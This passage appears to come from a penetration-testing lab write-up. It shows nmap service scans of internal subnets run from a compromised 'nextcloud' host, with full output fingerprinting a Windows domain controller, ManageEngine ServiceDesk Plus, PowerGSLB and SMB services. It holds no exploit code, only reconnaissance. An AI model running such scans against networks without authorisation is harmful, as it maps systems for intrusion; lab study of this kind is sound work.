# service scan (--system-dns takes no value; a resolver is named with --dns-servers)
./nmap -sV 192.168.20.31 --dns-servers 192.168.20.10


7. Scan Once More to Leave Nothing Out

  • It is still better to use the 43M version of nmap, which does not produce so many errors.

    └─# cat 10.10.110.74-host-discovery
    192.168.5.13
    192.168.5.21
    192.168.5.62
    192.168.5.74
    192.168.5.88
    192.168.5.231
    192.168.5.242
    192.168.20.1
    192.168.20.15
    192.168.20.31
    192.168.21.123
    192.168.20.10
    172.17.0.1
    172.17.0.2
    172.17.0.3
    172.17.0.4
    172.17.0.5
    172.17.0.6

    sshuser@nextcloud:~/saomiao$ ./nmap -sT -sV -sC -p- -iL host-discovery --system-dns -Pn
    Ignoring invalid max threads value 4294967295 > max (100000).
    Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 18:10 UTC
    Nmap scan report for 192.168.5.13
    Host is up (0.00091s latency).
    Not shown: 65532 filtered tcp ports (no-response)
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
    | ssh-hostkey: 
    |_  256 db:a6:6d:8b:e4:32:f3:57:1a:24:ef:6c:d6:15:ab:a9 (ED25519)
    53/tcp open  domain  (generic dns response: NOTIMP)
    80/tcp open  http?
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port53-TCP:V=7.95%I=7%D=4/7%Time=67F4166C%P=x86_64-alpine-linux-musl%r(
    SF:DNSStatusRequestTCP,E,"\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0");
    
    Nmap scan report for 192.168.5.21
    Host is up (0.00067s latency).
    Not shown: 65532 filtered tcp ports (no-response)
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
    | ssh-hostkey: 
    |_  256 db:a6:6d:8b:e4:32:f3:57:1a:24:ef:6c:d6:15:ab:a9 (ED25519)
    53/tcp open  domain  (generic dns response: NOTIMP)
    80/tcp open  http?
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port53-TCP:V=7.95%I=7%D=4/7%Time=67F41667%P=x86_64-alpine-linux-musl%r(
    SF:DNSStatusRequestTCP,E,"\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0");
    
    Nmap scan report for 192.168.5.62
    Host is up (0.00062s latency).
    Not shown: 65532 filtered tcp ports (no-response)
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
    53/tcp open  domain  (generic dns response: NOTIMP)
    80/tcp open  http?
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port53-TCP:V=7.95%I=7%D=4/7%Time=67F41667%P=x86_64-alpine-linux-musl%r(
    SF:DNSStatusRequestTCP,E,"\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0");
    
    Nmap scan report for 192.168.5.74
    Host is up (0.00058s latency).
    Not shown: 65532 filtered tcp ports (no-response)
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
    53/tcp open  domain  (generic dns response: NOTIMP)
    80/tcp open  http?
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port53-TCP:V=7.95%I=7%D=4/7%Time=67F4166C%P=x86_64-alpine-linux-musl%r(
    SF:DNSStatusRequestTCP,E,"\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0");
    
    WARNING: Service 192.168.20.31:8000 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
    WARNING: Service 172.17.0.1:8000 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
    WARNING: Service 172.17.0.3:8000 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
    Nmap scan report for 192.168.5.88
    Host is up (0.00061s latency).
    Not shown: 65534 filtered tcp ports (no-response)
    PORT   STATE SERVICE VERSION
    53/tcp open  domain  Unbound
    
    Nmap scan report for 192.168.5.231
    Host is up (0.00082s latency).
    Not shown: 65534 filtered tcp ports (no-response)
    PORT   STATE SERVICE VERSION
    53/tcp open  domain  Unbound
    
    Nmap scan report for 192.168.5.242
    Host is up (0.00065s latency).
    Not shown: 65534 filtered tcp ports (no-response)
    PORT   STATE SERVICE VERSION
    53/tcp open  domain  Unbound
    
    Nmap scan report for 192.168.20.1
    Host is up (0.00062s latency).
    Not shown: 65534 filtered tcp ports (no-response)
    PORT   STATE SERVICE VERSION
    53/tcp open  domain  Unbound
    
    Nmap scan report for 192.168.20.15
    Host is up (0.00072s latency).
    Not shown: 65531 filtered tcp ports (no-response)
    PORT      STATE SERVICE VERSION
    80/tcp    open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-title: Not Found
    |_http-server-header: Microsoft-HTTPAPI/2.0
    443/tcp   open  https?
    5985/tcp  open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    49443/tcp open  unknown
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Nmap scan report for 192.168.20.31
    Host is up (0.00014s latency).
    Not shown: 65527 closed tcp ports (conn-refused)
    PORT     STATE SERVICE    VERSION
    22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   256 02:ab:aa:01:64:de:c5:89:2f:75:e3:6a:a9:ff:78:ee (ECDSA)
    |_  256 9a:c2:d3:a0:fe:6a:ad:9a:4a:85:0d:c1:15:d1:13:be (ED25519)
    25/tcp   open  smtp       Postfix smtpd
    |_smtp-commands: nextcloud, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
    53/tcp   open  domain     PowerDNS Authoritative Server 4.1.11
    | dns-nsid: 
    |   NSID: powergslb (706f77657267736c62)
    |   id.server: powergslb
    |_  bind.version: PowerDNS Authoritative Server 4.1.11
    443/tcp  open  ssl/http   Apache httpd 2.4.52 ((Ubuntu))
    |_http-server-header: Apache/2.4.52 (Ubuntu)
    | tls-alpn: 
    |_  http/1.1
    |_http-title: Promote Business Category Bootstrap Responsive Web Template | ...
    |_ssl-date: TLS randomness does not represent time
    | ssl-cert: Subject: commonName=0x0security.com/organizationName=GiganticHosting CA/stateOrProvinceName=Stockholm/countryName=SE
    | Subject Alternative Name: DNS:0x0security.com, DNS:*.0x0security.com
    | Not valid before: 2024-07-16T15:39:00
    |_Not valid after:  2026-07-16T00:00:00
    5000/tcp open  http       Apache httpd 2.4.41 ((Unix))
    |_http-title: Gigantic Hosting | Home
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-server-header: Apache/2.4.41 (Unix)
    8000/tcp open  rtsp
    | fingerprint-strings: 
    |   FourOhFourRequest, GetRequest, HTTPOptions: 
    |     HTTP/1.0 404 Not Found
    |     Content-Type: text/html
    |     X-Frame-Options: DENY
    |     Content-Length: 179
    |     X-Content-Type-Options: nosniff
    |     <!doctype html>
    |     <html lang="en">
    |     <head>
    |     <title>Not Found</title>
    |     </head>
    |     <body>
    |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
    |     </body>
    |     </html>
    |   RTSPRequest: 
    |     RTSP/1.0 404 Not Found
    |     Content-Type: text/html
    |     X-Frame-Options: DENY
    |     Content-Length: 179
    |     X-Content-Type-Options: nosniff
    |     <!doctype html>
    |     <html lang="en">
    |     <head>
    |     <title>Not Found</title>
    |     </head>
    |     <body>
    |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
    |     </body>
    |     </html>
    |   SIPOptions: 
    |     SIP/2.0 404 Not Found
    |     Content-Type: text/html
    |     X-Frame-Options: DENY
    |     Content-Length: 179
    |     X-Content-Type-Options: nosniff
    |     <!doctype html>
    |     <html lang="en">
    |     <head>
    |     <title>Not Found</title>
    |     </head>
    |     <body>
    |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
    |     </body>
    |_    </html>
    |_http-title: Not Found
    |_rtsp-methods: ERROR: Script execution failed (use -d to debug)
    8080/tcp open  ssl/http   Python BaseHTTPServer http.server 2 or 3.0 - 3.1
    |_http-server-header: PowerGSLB/1.7.3 Python/2.7.5
    | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
    | Not valid before: 2020-01-09T12:45:01
    |_Not valid after:  2021-01-08T12:45:01
    |_http-title: Error response
    9100/tcp open  jetdirect?
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    Service Info: Host:  nextcloud; OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Nmap scan report for 192.168.21.123
    Host is up (0.0013s latency).
    Not shown: 65532 filtered tcp ports (no-response)
    PORT     STATE SERVICE       VERSION
    443/tcp  open  ssl/https     -
    |_http-title: ManageEngine ServiceDesk Plus 
    |_http-server-header: - 
    | http-methods: 
    |_ Potentially risky methods:
    | fingerprint-strings: 
    |   FourOhFourRequest: 
    |     HTTP/1.1 404 
    |     Set-Cookie: SDPSESSIONID=AC313B8BA98AEE540B776E38B700DCF6; Path=/; Secure; HttpOnly
    |     Content-Type: text/html;charset=UTF-8
    |     Vary: Accept-Encoding
    |     Date: Tue, 08 Apr 2025 01:24:55 GMT
    |     Connection: close
    |     Server: -
    |     <!DOCTYPE html>
    |     <html>
    |     <head>
    |     <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    |     <script>var isMSP = false; </script>
    |     <!-- CWF START -->
    |     <script type="text/javascript" src="/scripts/ClientLogger.js?11106"></script>
    |     <script>
    |     curLevStr = 'null';
    |     //Level.INFO is stored as default..
    |     curLev = 800;
    |     levelVals = [{NAME:"FINEST",VALUE:300},{NAME:"FINER",VALUE:400},{NAME:"FINE",VALUE:500},{NAME:"CONFIG",VALUE:700},{NAME:"INFO",VALUE:800},{NAME:"WARNING",VALUE:900},{NAME:"SEVERE",VALUE:1000},{NAME:"ALL",VALUE:1200}];//no i18n
    |     levelVals.length;
    |     Level = {FINEST:"300",FINER:"400",FINE:"500",CONFIG:"700
    |   GetRequest: 
    |     HTTP/1.1 200 
    |     Set-Cookie: SDPSESSIONID=43082E9C37B80EF6DAA69DC23AAD43BC; Path=/; Secure; HttpOnly
    |     Cache-Control: no-cache, no-store
    |     Expires: Thu, 01 Jan 1970 00:00:00 GMT
    |     Pragma: no-cache
    |     X-Content-Type-Options: nosniff
    |     X-XSS-Protection: 1;mode=block
    |     Content-Type: text/html;charset=UTF-8
    |     Vary: Accept-Encoding
    |     Date: Tue, 08 Apr 2025 01:24:55 GMT
    |     Connection: close
    |     Server: -
    |     <!DOCTYPE html>
    |     <html>
    |     <head>
    |     <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    |     <!--SD-67048 : client-encoder.js and associated files were included as part of XSS fixes. -->
    |     <script>
    |     enableEncoding = true;
    |     'null' == "false" || 'null' == "no" )
    |     enableEncoding = false;
    |     </script>
    |     <script language='JavaScript' type="text/javascript" src='/scripts/jquery-2.2.4.min.js'></script>
    |     <!--jquery-extension.js is used to override the extend method pr
    |   HTTPOptions: 
    |     HTTP/1.1 405 
    |     Set-Cookie: SDPSESSIONID=5630EB91549BFAFE598B843986DBD12E; Path=/; Secure; HttpOnly
    |     Allow: 
    |     Content-Type: text/plain
    |     Content-Length: 0
    |     Date: Tue, 08 Apr 2025 01:24:55 GMT
    |     Connection: close
    |_    Server: -
    |_http-title: ManageEngine ServiceDesk Plus
    |_http-server-header: -
    | http-methods: 
    |_  Potentially risky methods: 
    |_ssl-date: 2025-04-08T01:28:16+00:00; +6h57m47s from scanner time.
    | ssl-cert: Subject: commonName=SERVICEDESK/organizationName=Zoho Corporation/stateOrProvinceName=CA/countryName=US
    | Not valid before: 2020-03-12T21:14:09
    |_Not valid after:  2120-02-17T21:14:09
    445/tcp  open  microsoft-ds?
    5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port443-TCP:V=7.95%T=SSL%I=7%D=4/7%Time=67F418FD%P=x86_64-alpine-linux-
    SF:musl%r(GetRequest,25E6,"HTTP/1\.1\x20200\x20\r\nSet-Cookie:\x20SDPSESSI
    SF:ONID=43082E9C37B80EF6DAA69DC23AAD43BC;\x20Path=/;\x20Secure;\x20HttpOnl
    SF:y\r\nCache-Control:\x20no-cache,\x20no-store\r\nExpires:\x20Thu,\x2001\
    SF:x20Jan\x201970\x2000:00:00\x20GMT\r\nPragma:\x20no-cache\r\nX-Content-T
    SF:ype-Options:\x20nosniff\r\nX-XSS-Protection:\x201;mode=block\r\nContent
    SF:-Type:\x20text/html;charset=UTF-8\r\nVary:\x20Accept-Encoding\r\nDate:\
    SF:x20Tue,\x2008\x20Apr\x202025\x2001:24:55\x20GMT\r\nConnection:\x20close
    SF:\r\nServer:\x20-\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n<meta\x20ht
    SF:tp-equiv=\"X-UA-Compatible\"\x20content=\"IE=Edge\">\n\n\n\n\r\n\n\n<!-
    SF:-SD-67048\x20:\x20client-encoder\.js\x20and\x20associated\x20files\x20w
    SF:ere\x20included\x20as\x20part\x20of\x20XSS\x20fixes\.\x20-->\n\x20\x20\
    SF:x20\x20<script>\n\x20\x20\x20\x20var\x20enableEncoding\x20=\x20true;\n\
    SF:x20\x20\x20\x20if\(\x20'null'\x20==\x20\"false\"\x20\|\|\x20'null'\x20=
    SF:=\x20\"no\"\x20\)\n\x20\x20\x20\x20{\n\x20\x20enableEncoding\x20=\x20fa
    SF:lse;\n\x20\x20\x20\x20}\n\x20\x20\x20\x20</script>\n\n\x20\x20\x20\x20\
    SF:n\x20\x20\x20\x20\x20\x20\x20\x20<script\x20language='JavaScript'\x20ty
    SF:pe=\"text/javascript\"\x20src='/scripts/jquery-2\.2\.4\.min\.js'></scri
    SF:pt>\n\x20\x20\x20\x20\x20\x20\x20\x20<!--jquery-extension\.js\x20is\x20
    SF:used\x20to\x20override\x20the\x20extend\x20method\x20pr")%r(HTTPOptions
    SF:,DF,"HTTP/1\.1\x20405\x20\r\nSet-Cookie:\x20SDPSESSIONID=5630EB91549BFA
    SF:FE598B843986DBD12E;\x20Path=/;\x20Secure;\x20HttpOnly\r\nAllow:\x20\r\n
    SF:Content-Type:\x20text/plain\r\nContent-Length:\x200\r\nDate:\x20Tue,\x2
    SF:008\x20Apr\x202025\x2001:24:55\x20GMT\r\nConnection:\x20close\r\nServer
    SF::\x20-\r\n\r\n")%r(FourOhFourRequest,2595,"HTTP/1\.1\x20404\x20\r\nSet-
    SF:Cookie:\x20SDPSESSIONID=AC313B8BA98AEE540B776E38B700DCF6;\x20Path=/;\x2
    SF:0Secure;\x20HttpOnly\r\nContent-Type:\x20text/html;charset=UTF-8\r\nVar
    SF:y:\x20Accept-Encoding\r\nDate:\x20Tue,\x2008\x20Apr\x202025\x2001:24:55
    SF:\x20GMT\r\nConnection:\x20close\r\nServer:\x20-\r\n\r\n\n\n<!DOCTYPE\x2
    SF:0html>\n<html>\n<head>\n<meta\x20http-equiv=\"X-UA-Compatible\"\x20cont
    SF:ent=\"IE=Edge\">\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\x20\x20\x20\x20\x20\x20\
    SF:x20\x20<script>var\x20isMSP\x20=\x20false;\x20</script>\n\x20\x20\x20\x
    SF:20\n\x20\x20\x20\x20<!--\x20CWF\x20START\x20-->\n\x20\x20\x20\x20\n\n\n
    SF:\n\n<script\x20type=\"text/javascript\"\x20src=\"/scripts/ClientLogger\
    SF:.js\?11106\"></script>\n\n<script>\nvar\x20curLevStr\x20=\x20'null';\n/
    SF:/Level\.INFO\x20is\x20stored\x20as\x20default\.\.\nvar\x20curLev\x20=\x
    SF:20800;\n\nvar\x20levelVals\x20=\x20\[{NAME:\"FINEST\",VALUE:300},{NAME:
    SF:\"FINER\",VALUE:400},{NAME:\"FINE\",VALUE:500},{NAME:\"CONFIG\",VALUE:7
    SF:00},{NAME:\"INFO\",VALUE:800},{NAME:\"WARNING\",VALUE:900},{NAME:\"SEVE
    SF:RE\",VALUE:1000},{NAME:\"ALL\",VALUE:1200}\];//no\x20i18n\nvar\x20len\x
    SF:20=\x20levelVals\.length;\n\nvar\x20Level\x20=\x20{FINEST:\"300\",FINER
    SF::\"400\",FINE:\"500\",CONFIG:\"700");
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    | smb2-security-mode: 
    |   3:1:1: 
    |_    Message signing enabled but not required
    |_clock-skew: mean: 6h57m46s, deviation: 0s, median: 6h57m46s
    | smb2-time: 
    |   date: 2025-04-08T01:27:48
    |_  start_date: N/A
    
    Nmap scan report for 192.168.20.10
    Host is up (0.00067s latency).
    Not shown: 65515 filtered tcp ports (no-response)
    PORT      STATE SERVICE       VERSION
    53/tcp    open  domain        Simple DNS Plus
    88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-08 01:24:49Z)
    135/tcp   open  msrpc         Microsoft Windows RPC
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: 0x0security.local0., Site: Default-First-Site-Name)
    445/tcp   open  microsoft-ds?
    464/tcp   open  kpasswd5?
    593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    636/tcp   open  tcpwrapped
    3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: 0x0security.local0., Site: Default-First-Site-Name)
    3269/tcp  open  tcpwrapped
    5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    9389/tcp  open  mc-nmf        .NET Message Framing
    49666/tcp open  msrpc         Microsoft Windows RPC
    49668/tcp open  msrpc         Microsoft Windows RPC
    49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    49670/tcp open  msrpc         Microsoft Windows RPC
    49680/tcp open  msrpc         Microsoft Windows RPC
    49687/tcp open  msrpc         Microsoft Windows RPC
    49703/tcp open  msrpc         Microsoft Windows RPC
    Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    |_nbstat: NetBIOS name: DC, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:ea:cd (VMware)
    |_clock-skew: 6h57m45s
    | smb2-time: 
    |   date: 2025-04-08T01:27:33
    |_  start_date: N/A
    | smb2-security-mode: 
    |   3:1:1: 
    |_    Message signing enabled and required
    
    Nmap scan report for 172.17.0.1
    Host is up (0.00021s latency).
    Not shown: 65527 closed tcp ports (conn-refused)
    PORT     STATE SERVICE    VERSION
    22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   256 02:ab:aa:01:64:de:c5:89:2f:75:e3:6a:a9:ff:78:ee (ECDSA)
    |_  256 9a:c2:d3:a0:fe:6a:ad:9a:4a:85:0d:c1:15:d1:13:be (ED25519)
    25/tcp   open  smtp       Postfix smtpd
    |_smtp-commands: nextcloud, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
    53/tcp   open  domain     PowerDNS Authoritative Server 4.1.11
    | dns-nsid: 
    |   NSID: powergslb (706f77657267736c62)
    |   id.server: powergslb
    |_  bind.version: PowerDNS Authoritative Server 4.1.11
    443/tcp  open  ssl/http   Apache httpd 2.4.52 ((Ubuntu))
    |_http-server-header: Apache/2.4.52 (Ubuntu)
    | tls-alpn: 
    |_  http/1.1
    | ssl-cert: Subject: commonName=0x0security.com/organizationName=GiganticHosting CA/stateOrProvinceName=Stockholm/countryName=SE
    | Subject Alternative Name: DNS:0x0security.com, DNS:*.0x0security.com
    | Not valid before: 2024-07-16T15:39:00
    |_Not valid after:  2026-07-16T00:00:00
    |_http-title: Promote Business Category Bootstrap Responsive Web Template | ...
    |_ssl-date: TLS randomness does not represent time
    5000/tcp open  http       Apache httpd 2.4.41 ((Unix))
    |_http-title: Gigantic Hosting | Home
    |_http-server-header: Apache/2.4.41 (Unix)
    | http-methods: 
    |_  Potentially risky methods: TRACE
    8000/tcp open  rtsp
    |_rtsp-methods: ERROR: Script execution failed (use -d to debug)
    | fingerprint-strings: 
    |   FourOhFourRequest, GetRequest, HTTPOptions: 
    |     HTTP/1.0 404 Not Found
    |     Content-Type: text/html
    |     X-Frame-Options: DENY
    |     Content-Length: 179
    |     X-Content-Type-Options: nosniff
    |     <!doctype html>
    |     <html lang="en">
    |     <head>
    |     <title>Not Found</title>
    |     </head>
    |     <body>
    |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
    |     </body>
    |     </html>
    |   RTSPRequest: 
    |     RTSP/1.0 404 Not Found
    |     Content-Type: text/html
    |     X-Frame-Options: DENY
    |     Content-Length: 179
    |     X-Content-Type-Options: nosniff
    |     <!doctype html>
    |     <html lang="en">
    |     <head>
    |     <title>Not Found</title>
    |     </head>
    |     <body>
    |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
    |     </body>
    |     </html>
    |   SIPOptions: 
    |     SIP/2.0 404 Not Found
    |     Content-Type: text/html
    |     X-Frame-Options: DENY
    |     Content-Length: 179
    |     X-Content-Type-Options: nosniff
    |     <!doctype html>
    |     <html lang="en">
    |     <head>
    |     <title>Not Found</title>
    |     </head>
    |     <body>
    |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
    |     </body>
    |_    </html>
    |_http-title: Not Found
    8080/tcp open  ssl/http   Python BaseHTTPServer http.server 2 or 3.0 - 3.1
    |_http-title: Error response
    | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
    | Not valid before: 2020-01-09T12:45:01
    |_Not valid after:  2021-01-08T12:45:01
    |_http-server-header: PowerGSLB/1.7.3 Python/2.7.5
    9100/tcp open  jetdirect?
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port8000-TCP:V=7.95%I=7%D=4/7%Time=67F41902%P=x86_64-alpine-linux-musl%
    SF:r(GetRequest,133,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20
    SF:text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-Co
    SF:ntent-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20la
    SF:ng=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<body
    SF:>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20was\
    SF:x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")%r(F
    SF:ourOhFourRequest,133,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:
    SF:\x20text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\n
    SF:X-Content-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x
    SF:20lang=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<
    SF:body>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20
    SF:was\x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")
    SF:%r(HTTPOptions,133,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x
    SF:20text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-
    SF:Content-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20
    SF:lang=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<bo
    SF:dy>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20wa
    SF:s\x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")%r
    SF:(RTSPRequest,133,"RTSP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20
    SF:text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-Co
    SF:ntent-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20la
    SF:ng=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<body
    SF:>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20was\
    SF:x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")%r(S
    SF:IPOptions,132,"SIP/2\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20text
    SF:/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-Conten
    SF:t-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20lang=\
    SF:"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<body>\n\
    SF:x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20was\x20n
    SF:ot\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n");
    Service Info: Host:  nextcloud; OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Nmap scan report for 172.17.0.2
    Host is up (0.00028s latency).
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT    STATE SERVICE  VERSION
    53/tcp  open  domain   PowerDNS Authoritative Server 4.1.11
    | dns-nsid: 
    |   NSID: powergslb (706f77657267736c62)
    |   id.server: powergslb
    |_  bind.version: PowerDNS Authoritative Server 4.1.11
    443/tcp open  ssl/http Python BaseHTTPServer http.server 2 or 3.0 - 3.1
    |_http-title: Error response
    | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
    | Not valid before: 2020-01-09T12:45:01
    |_Not valid after:  2021-01-08T12:45:01
    |_http-server-header: PowerGSLB/1.7.3 Python/2.7.5
    
    Nmap scan report for 172.17.0.3
    Host is up (0.000091s latency).
    Not shown: 65534 closed tcp ports (conn-refused)
    PORT     STATE SERVICE VERSION
    8000/tcp open  rtsp
    |_rtsp-methods: ERROR: Script execution failed (use -d to debug)
    | fingerprint-strings: 
    |   FourOhFourRequest, GetRequest, HTTPOptions: 
    |     HTTP/1.0 404 Not Found
    |     Content-Type: text/html
    |     X-Frame-Options: DENY
    |     Content-Length: 179
    |     X-Content-Type-Options: nosniff
    |     <!doctype html>
    |     <html lang="en">
    |     <head>
    |     <title>Not Found</title>
    |     </head>
    |     <body>
    |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
    |     </body>
    |     </html>
    |   RTSPRequest: 
    |     RTSP/1.0 404 Not Found
    |     Content-Type: text/html
    |     X-Frame-Options: DENY
    |     Content-Length: 179
    |     X-Content-Type-Options: nosniff
    |     <!doctype html>
    |     <html lang="en">
    |     <head>
    |     <title>Not Found</title>
    |     </head>
    |     <body>
    |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
    |     </body>
    |     </html>
    |   SIPOptions: 
    |     SIP/2.0 404 Not Found
    |     Content-Type: text/html
    |     X-Frame-Options: DENY
    |     Content-Length: 179
    |     X-Content-Type-Options: nosniff
    |     <!doctype html>
    |     <html lang="en">
    |     <head>
    |     <title>Not Found</title>
    |     </head>
    |     <body>
    |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
    |     </body>
    |_    </html>
    |_http-title: Not Found
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port8000-TCP:V=7.95%I=7%D=4/7%Time=67F41902%P=x86_64-alpine-linux-musl%
    SF:r(GetRequest,133,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20
    SF:text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-Co
    SF:ntent-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20la
    SF:ng=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<body
    SF:>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20was\
    SF:x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")%r(F
    SF:ourOhFourRequest,133,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:
    SF:\x20text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\n
    SF:X-Content-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x
    SF:20lang=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<
    SF:body>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20
    SF:was\x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")
    SF:%r(HTTPOptions,133,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x
    SF:20text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-
    SF:Content-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20
    SF:lang=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<bo
    SF:dy>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20wa
